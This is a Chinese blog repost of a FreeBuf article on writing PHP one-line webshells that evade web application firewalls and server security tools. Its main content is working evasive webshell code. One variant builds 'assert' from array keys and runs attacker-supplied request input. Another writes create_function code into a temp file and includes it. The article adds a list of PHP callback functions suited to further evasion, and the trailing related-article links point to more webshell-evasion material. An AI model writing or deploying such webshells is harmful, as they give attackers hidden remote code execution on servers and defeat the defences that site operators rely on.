php免杀一句话2018,经验分享 | 一句话免杀编写思路

最新推荐文章于 2024-06-24 15:57:47 发布
最新推荐文章于 2024-06-24 15:57:47 发布
阅读量361 收藏 1
点赞数
文章标签: php免杀一句话2018

*本文原创作者:crhua,本文属FreeBuf原创奖励计划,未经许可禁止转载

前言

在渗透测试时,我们向网站服务器写入一句话webshell时,往往会被某狗,某锁,某卫士拦截,导致我们拿不下shell。

一句话webshell的工作原理:当前PHP脚本会去读取并执行变量中的内容。

文章我介绍两种方法:1.eval/assert花式变形

2.写入缓存,执行webshell

eval/assert 花式变形<?php

eval($_POST['crhua']);

?>

这是最常见的一句话webshell,当然这是不免杀的,一些常见的waf 是基于特定规则查杀文件,当我们绕过这些规则就实现了所谓的免杀。

废话不多说只直接上免杀一句话<?php

$fruits = array("a" => "lemon", "ss" => "orange", "ssr" => "banana", "t" => "apple");

function test_alter(&$item1, $key, $prefix)

{

$item1 = "$prefix: $item1";

}

function test_print($item2, $key)

{

echo "$key. $item2
\n";

}

echo "Before ...:\n";

array_walk($fruits, 'test_print');

$a =array_keys($fruits);

print_r($a);

$m =$a[0].$a[1];

$n ='er';

$q = $m.$n.'t'; //assert

$r = $_REQUEST['crhua'];

@$q($r);

//密码crhua

?>

89f2a265c4285577acae030851765366.png

7d14eb771f3b37be8989b4bf85fa8966.png

当然这个webshell 也可以绕过某锁,首先我们先在网站目录下写入最简单的一句话webshell<?php

eval($_POST['x'];

?>

不用尝试就知道肯定会被拦截

de699b542b9a25ca6316058a9ddd3d0d.png

但是这里一句话是免杀的

8f988c129bebbc111886df7e321da570.png

下面是一些不常用的PHP函数,可以利用这些函数编写免杀一句话,函数用法自行百度。array_map(),array_rand(),array_splice

unsort(),uasort(),uksort()

array_map()

array_filter()

array_reduce()

array_diff_uassoc(),array_diff_ukey()

array_udiff(),array_udiff_assoc()

array_udiff_uassoc()

array_intersect_assoc(),array_intersect_uassoc()

array_uintersect(),array_uintersect_assoc()

array_uintersect_uassoc()

array_walk(),array_walk_recursive()

xml_set_character_data_handler()

xml_set_default_handler()

xml_set_external_entity_ref_handler()

xml_set_notation_decl_handler()

xml_set_processing_instruction_handler()

xml_set_start_namespace_decl_handler()

xml_set_unparsed_entity_decl_handler()

set_error_handler()

register_tick_function()

uopz_function()

写入缓存,执行webshell

这种方法用到两个函数tempnam() : 建立一个具有唯一文件名的文件

sys_get_temp_dir() : 返回用于临时文件的目录

首先介绍一个概念:定界符,PHP定界符的作用是按照原样,包括换行格式什么的,输出在其内部的东西;

举个栗子:<?php

$a = <<

"freebuf",fb

h;

3a86ce48ccc1af2cf3992045c1ce9576.png

那么我们可以在定界符内写入php代码,利用前面提到的两个函数构造webshell。

代码如下:<?php

error_reporting();

$p = <<

\$crhua = $_POST['crhua'];

function crhua($crhua){

array_map(create_function("",\$crhua),array(1));

}

crhua(\$crhua);

?>

h;

$temp = tempnam(sys_get_temp_dir(),''); //获取缓存文件的路径

fwrite(fopen($temp,'w'),$p),   //向缓存文件中写入内容

include $temp;

?>

23a797dfe759dd862b3f71dae6504028.png

这种方法同样也可以绕过某锁

d28c197b2ec1fe34916c7a1d5f801d56.png

小小总结

文章提供了两种编写免杀一句话的思路,当然还有更多编写免杀一句话的奇淫技巧。免杀就是在不断尝试的基础上玩转的,欢迎和大家一起探讨更多姿势。

*本文原创作者:crhua,本文属FreeBuf原创奖励计划,未经许可禁止转载

weixin_39785081
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
decode函数吗 jsp_蚁剑改造计划之实现JSP一句话
weixin_39969028的博客
12-30 545
前言本人有意写一份系列文章,主要内容是分享蚁剑改造过程中的一些技巧与经验。因为蚁剑的相关文档实在比较少,可能很多同学都像自己当初一样想要二次开发可是不知如何下手。不敢贸然称之为教程,只是把改造的过程发出来供大家借鉴,希望其他同学能够少走弯路。正文基本原理由于Java中没有所谓的eval函数,无法对直接传递的代码进行解析执行。所以不管是蚁剑还是菜刀对于JSP的shell一直是采用custom模式,即...
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
热门推荐
时光隧道
03-28 3万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
面试经验分享 | 渗透测试工程师(实习岗)
2301_80127209的博客
06-24 1006
Webshell是黑客经常使用的一种**恶意脚本,常见的webshell编写语言为asp、jsp和php
关于PHP的webshell免杀小结
2401_84488651的博客
05-30 883
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
经验分享】-PHP程序员的技能图谱
dream_successor的专栏
03-28 3327
停了一个多月没写技术文档,主要是因为本人最近离职了,当然现在回来了,也就说明有了新的工作着落了。作为一个工作两年的程序员,能在深圳知名企业找到工作,一定程度上也能把你从离职前的失意转为自信和动力,毕竟跳槽总是不易的。乔布斯说过:那些看似在生命中没有关联、微不足道的事情就像一个个散落在各地的珍珠,当我的人生向前展望时我不会把它们都串联起来。但是等到我回顾人生时,我必须相信这些片断会在未来的某一天串连...
mysql第二条减第一条_MySQL 性能优化的最佳20多条经验分享(收藏)
weixin_28692153的博客
02-04 496
1. 为查询缓存优化你的查询大多数的MySQL服务器都开启了查询缓存。这是提高性最有效的方法之一,而且这是被MySQL的数据库引擎处理的。当有很多相同的查询被执行了多次的时候,这些查询结果会被放到一个缓存中,这样,后续的相同的查询就不用操作表而直接访问缓存结果了。这里最主要的问题是,对于程序员来说,这个事情是很容易被忽略的。因为,我们某些查询语句会让MySQL不使用缓存。请看下面的示例:复制代码 ...
PHP一课一得
2201_75815645的博客
06-06 520
在未来的学习和工作中,我将继续深入学习PHP以及其他相关技术,不断提升自己的技能和能力,为构建更好的Web应用程序贡献力量。通过编写简单的脚本和程序,我逐渐熟悉了PHP的编程风格和特性。前端技术栈:熟悉并运用HTML、CSS、JavaScript等前端技术,实现页面的样式设计、动态效果等,同时考虑响应式设计,确保在不同设备上都有良好的显示效果。使用合适的框架:考虑使用流行的PHP框架,如Laravel、Symfony、CodeIgniter等,以提高开发效率并确保项目的可维护性和安全性。
【网络安全面经】2023届网络安全岗秋招面试题及面试经验分享
admin_man的博客
09-20 6025
内容来自于社群内2023届毕业生在毕业前持续整理、收集的安全岗面试题及面试经验分享~
经验分享:C++程序员从小白到大神的成长之路
pangzizzzz的博客
07-20 1409
序言 C++是一门略微比其他语言难一点的语言,它更偏向于底层,而且它包含的思想比较多,如果你只学习语言本身,不关注它所涉及的思想,将会在未来的实际应用中举步维艰,所以学习该门语言需要你付出双倍的精力来学习它的附属知识。 学习编程语言后你要做哪些 编程语言本身的思想都是贯通的,无论你学习C/C++,JAVA还是PHP,Object_C,Python。他们都是一种思想,当你学会其中一门去学其他的就会变得相对容易。 学会一门语言后可以去做这些事情,你主要找一个方向努力即可: 传统开发(如开发各种管理系统) 移动
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 5879
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
php牛人答辩微信小程序.zip
12-26
"需要的可以来留言,分享给大家"这一句话,表达了作者愿意与社区共享和交流的态度,鼓励有兴趣的人参与讨论和改进。 【标签】"项目源码 项目开发 微信小程序 毕业设计 java源码",揭示了项目的几个关键点: 1. **...
仿百度网盘
03-06
这句话强调了该项目的性质和使用限制。首先,"自行研究下载"意味着你需要自行获取和研究项目的代码,这是一个学习和探索的过程,而非直接提供现成的服务。"仅共享资料"表明项目是为了分享知识,而不是提供实际的云...
thinkphp 3.2.3
03-25
"官网下载有点慢了,我就拿出来了"这句话暗示了ThinkPHP 3.2.3在当时可能由于服务器负载或网络状况,使得开发者难以快速获取,因此分享者提供了本地的下载资源。 **一、ThinkPHP 3.2.3核心特性** 1. **快速开发**...
phpsou免费版
09-30
"欢迎大家使用"这句话暗示了phpsou可能有一个活跃的社区,用户可以在其中获取帮助、分享经验,甚至参与项目的改进。 总的来说,phpsou免费版提供了一个完整的搜索解决方案,结合了高效的Sphinx引擎和PHP的易用性,...
AuthClassed-开源
05-03
"使用AuthClassed就像在您要保护的网页顶部放置一条代码行一样简单",这句话强调了其易用性和集成的简便性,意味着开发者无需编写大量的自定义代码就能快速安全地保护其网页。 **标签分析:** "开源软件"这个标签...
互联网生态峰会PPT模板
07-13
【作品名称】:互联网生态峰会PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
钢管扣件质量检查表.docx
07-13
钢管扣件质量检查表.docx
Foxit-Installer-Clean-Up
最新发布
07-13
福昕编辑器残留清除工具
php一句话木马免杀
08-03
总结来说,PHP一句话木马免杀是指通过一些技巧和手段来绕过安全检测,使木马代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值